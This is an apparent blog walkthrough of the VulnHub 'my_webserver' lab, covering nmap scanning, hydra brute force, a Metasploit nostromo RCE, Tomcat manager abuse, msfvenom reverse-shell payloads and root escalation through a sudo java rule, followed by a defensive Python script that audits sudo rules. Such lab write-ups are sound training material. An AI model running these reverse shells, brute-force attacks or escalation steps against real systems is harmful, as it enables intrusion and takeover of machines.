
VulnHub: my_webserver

Date: 2023-02-06 00:55:37

I. Information gathering

1. Scan the /24 subnet to find the target IP

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.62.129/24                       
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-01 23:55 HKT
Nmap scan report for 192.168.62.1
Host is up (0.00026s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.62.2
Host is up (0.00019s latency).
MAC Address: 00:50:56:F4:60:0B (VMware)
Nmap scan report for 192.168.62.130
Host is up (0.00047s latency).
MAC Address: 00:0C:29:39:83:54 (VMware)
Nmap scan report for 192.168.62.254
Host is up (0.00038s latency).
MAC Address: 00:50:56:EB:19:29 (VMware)
Nmap scan report for 192.168.62.129
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.05 seconds

Since I am familiar with the IPs on this LAN, I know that 192.168.62.130 is the newly added target machine.

2. Scan the target's open ports

① TCP ports

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.62.130
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-01 23:57 HKT
Nmap scan report for 192.168.62.130
Host is up (0.0022s latency).
Not shown: 65528 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
2222/tcp open  EtherNetIP-1
3306/tcp open  mysql
8009/tcp open  ajp13
8080/tcp open  http-proxy
8081/tcp open  blackice-icecap
MAC Address: 00:0C:29:39:83:54 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.70 seconds

② UDP ports

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --min-rate 10000 -p- 192.168.62.130 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-02 00:00 HKT
Warning: 192.168.62.130 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.62.130
Host is up (0.00053s latency).
All 65535 scanned ports on 192.168.62.130 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
MAC Address: 00:0C:29:39:83:54 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 72.87 seconds
Service versions on the open ports:

┌──(kali㉿kali)-[/usr/share/wordlists]
└─$ sudo nmap -sV -sT -O -p22,80,2222,3306,8009,8080,8081 192.168.62.130
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-02 23:45 HKT
Nmap scan report for 192.168.62.130
Host is up (0.00068s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
2222/tcp open  http    nostromo 1.9.6
3306/tcp open  mysql   MySQL (unauthorized)
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
8081/tcp open  http    nginx 1.14.2
MAC Address: 00:0C:29:39:83:54 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.39 seconds


II. Getting a shell

1. Port 22

① Searching for exploits for this version: none

┌──(kali㉿kali)-[/usr/share/wordlists]
└─$ searchsploit OpenSSH 7.9p1 Debian 10+deb10u2                        
Exploits: No Results
Shellcodes: No Results

② Simple brute force: nothing

┌──(kali㉿kali)-[/usr/share/wordlists]
└─$ hydra -l webserver -P rockyou.txt 192.168.62.130 ssh -f
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-02 23:38:46
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.62.130:22/
[ERROR] target ssh://192.168.62.130:22/ does not support password authentication (method reply 4).

3. Exploiting port 2222

① Search for known vulnerabilities in the service on port 2222

msf6 > search nostromo

Matching Modules
================

   #  Name                                   Disclosure Date  Rank  Check  Description
   -  ----                                   ---------------  ----  -----  -----------
   0  exploit/multi/http/nostromo_code_exec  2019-10-20       good  Yes    Nostromo Directory Traversal Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/nostromo_code_exec

② An RCE module is available; try it

msf6 > use 0
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(multi/http/nostromo_code_exec) > option
[-] Unknown command: option
msf6 exploit(multi/http/nostromo_code_exec) > options

Module options (exploit/multi/http/nostromo_code_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/nostromo_code_exec) > set rhosts 192.168.62.130
rhosts => 192.168.62.130
msf6 exploit(multi/http/nostromo_code_exec) > set rport 2222
rport => 2222
msf6 exploit(multi/http/nostromo_code_exec) > set lhost 192.168.62.129
lhost => 192.168.62.129
msf6 exploit(multi/http/nostromo_code_exec) > options

Module options (exploit/multi/http/nostromo_code_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.62.130   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    2222             yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.62.129   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/nostromo_code_exec) > run

[*] Started reverse TCP handler on 192.168.62.129:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (192.168.62.129:4444 -> 192.168.62.130:53560) at 2023-02-05 18:05:01 +0800

id
uid=1(daemon) gid=1(daemon) groups=1(daemon),0(root)
shell
[*] Trying to find binary 'python' on the target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /usr/bin/bash
id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon),0(root)
daemon@webserver:/usr/bin$

Got a shell!

4. Port 3306 (my own attempt)

① Simple brute force: MySQL appears to have a host allow-list enabled

┌──(kali㉿kali)-[/usr/share/wordlists]
└─$ hydra -l root -P rockyou.txt 192.168.62.130 mysql -f
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-02 23:41:25
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://192.168.62.130:3306/
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server

5. 8008

6. Port 8080

Open http://ip:port in a browser to see what each service is running; from the Tomcat service, find its management (backend) URL:

III. Privilege escalation

1. Gather system information

daemon@webserver:/usr/bin$ ls -l /etc/crontab
ls -l /etc/crontab
-rw-r--r-- 1 root root 1042 Oct 11  2019 /etc/crontab
daemon@webserver:/usr/bin$ ls -l /etc/passwd
ls -l /etc/passwd
-rw-r--r-- 1 root root 1447 Mar 31  2020 /etc/passwd
daemon@webserver:/usr/bin$ sudo -l
sudo -l


sudo: unable to resolve host webserver: Name or service not known

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

② Look for writable files: find / -writable -type f 2>/dev/null | grep users.xml

③ The Tomcat user configuration file is found; reading it gives the Tomcat manager username and password

④ Log in to the Tomcat manager; it has a file upload feature

⑤ Build a reverse-shell payload with msfvenom

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.62.129
lhost => 192.168.62.129
msf6 exploit(multi/handler) > set lport 8888
lport => 8888
msf6 exploit(multi/handler) > set payload java/jsp_shell_
set payload java/jsp_shell_bind_tcp     set payload java/jsp_shell_reverse_tcp  
msf6 exploit(multi/handler) > set payload java/jsp_shell_
set payload java/jsp_shell_bind_tcp     set payload java/jsp_shell_reverse_tcp  
msf6 exploit(multi/handler) > set payload java/jsp_shell_reverse_tcp 
payload => java/jsp_shell_reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.62.129:8888
[*] Command shell session 1 opened (192.168.62.129:8888 -> 192.168.62.130:58322) at 2023-02-05 22:36:47 +0800

python -c 'import pty;pty.spawn("/bin/bash")'   # use python to get an interactive shell
tomcat@webserver:~$

⑧ Check the tomcat user's sudo rights: it can run java as root.

tomcat@webserver:/tmp$ sudo -l
sudo -l
sudo: unable to resolve host webserver: Name or service not known
Matching Defaults entries for tomcat on webserver:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tomcat may run the following commands on webserver:
    (ALL) NOPASSWD: /usr/lib/jvm/adoptopenjdk-8-hotspot-amd64/bin/java

⑨ Build a .jar payload with msfvenom

sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.62.129 LPORT=9999 -f jar >xiaoliyu.jar

⑩ Upload the payload to the target with the upload command (for some reason upload did not work for me, so I copied the file with scp)

⑪ Set up an msf listener on port 9999

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.62.129
lhost => 192.168.62.129
msf6 exploit(multi/handler) > set lport 9999
lport => 9999
msf6 exploit(multi/handler) > set payload java/jsp_shell_
set payload java/jsp_shell_bind_tcp     set payload java/jsp_shell_reverse_tcp  
msf6 exploit(multi/handler) > set payload java/jsp_shell_
set payload java/jsp_shell_bind_tcp     set payload java/jsp_shell_reverse_tcp  
msf6 exploit(multi/handler) > set payload java/jsp_shell_reverse_tcp 
payload => java/jsp_shell_reverse_tcp
msf6 exploit(multi/handler) > run

⑫ Run the .jar file as root (for some reason this errored for me; people online say the file got corrupted during transfer, and a copy transferred with sftp would not run either, so another privilege-escalation route is needed; normally step ⑬ would already give root)

sudo -u root java -jar xiaoliyu.jar

⑬ After the connection comes back, use python to get an interactive shell; it is now running as root
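The sudo rule found in step ⑧ is the whole escalation: a user allowed to run java as root without a password can run any code of their own as root, which is why a defender should audit sudoers for such rules. As an added example, not code from the original post, this script parses `sudo -l` output and flags rules that amount to a root shell; the sample input is constructed from the tomcat rule shown above plus one harmless rule, and the CODE_RUNNERS list is illustrative.

```python
import os
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Binaries that execute caller-supplied code by design; letting them run as root
# is the same as granting root. Illustrative list, not exhaustive.
CODE_RUNNERS = {"java", "python", "python3", "perl", "ruby", "bash", "sh", "env", "find", "vi", "vim"}

# "(ALL) NOPASSWD: /path/a, /path/b" -> runas, tag prefix, comma-separated commands
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(.+?)\s*$")


@dataclass
class SudoRule:
    runas: str
    nopasswd: bool
    command: str


def parse_sudo_l(text: str) -> List[SudoRule]:
    """Extract the rules listed after 'may run the following commands'."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules and line.strip() else None
        if not m:
            continue
        runas, tags, commands = m.groups()
        for cmd in commands.split(","):
            rules.append(SudoRule(runas.strip(), "NOPASSWD:" in tags, cmd.strip()))
    return rules


def assess(rule: SudoRule) -> Optional[Tuple[str, str]]:
    """Return (severity, reason) for rules that amount to a root shell, else None."""
    if rule.command == "ALL":
        reason = "unrestricted command"
    else:
        binary = os.path.basename(rule.command.split()[0])
        if binary not in CODE_RUNNERS:
            return None
        reason = f"{binary} runs caller-supplied code (e.g. -jar) as {rule.runas}"
    # NOPASSWD removes the last barrier: no credential is needed from the caller.
    return ("high" if rule.nopasswd else "medium", reason)


def audit(text: str) -> List[Tuple[SudoRule, str, str]]:
    return [(r, *a) for r in parse_sudo_l(text) if (a := assess(r))]


# Constructed sample: the tomcat rule from the walkthrough plus one harmless rule.
SAMPLE_SUDO_L = """\
User tomcat may run the following commands on webserver:
    (ALL) NOPASSWD: /usr/lib/jvm/adoptopenjdk-8-hotspot-amd64/bin/java
    (root) /bin/cat /var/log/tomcat9/catalina.out
"""
```

Running `audit(SAMPLE_SUDO_L)` returns one high-severity finding for the java rule and nothing for the cat rule; the fix on the host is to drop the rule or restrict it to a fixed, non-writable jar path.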

To be continued

From: https://www.cnblogs.com/xiaoliyulixianji/p/17084564.html
